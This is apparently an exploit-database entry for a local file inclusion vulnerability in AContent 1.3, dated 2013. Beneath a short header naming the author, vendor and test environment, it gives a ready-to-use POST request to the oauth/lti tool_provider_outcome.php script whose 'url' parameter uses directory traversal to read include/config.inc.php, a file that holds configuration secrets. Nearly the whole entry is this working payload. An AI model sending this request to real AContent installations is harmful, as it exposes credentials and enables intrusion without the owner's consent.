17 lines
No EOL
608 B
Text
17 lines
No EOL
608 B
Text
##########################################
|
|
[~] Exploit Title: AContent 1.3 Local File Inclusion
|
|
[~] Date: 21-03-2013
|
|
[~] Author: DaOne
|
|
[~] Vendor Homepage: http://atutor.ca/acontent/
|
|
[~] Software Link: https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|
|
[~] Category: webapps/php
|
|
[~] Version: 1.3
|
|
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
|
|
##########################################
|
|
|
|
# Exploit
|
|
POST http://localhost/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1
|
|
|
|
grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade&url=../../../include/config.inc.php
|
|
|
|
-end- |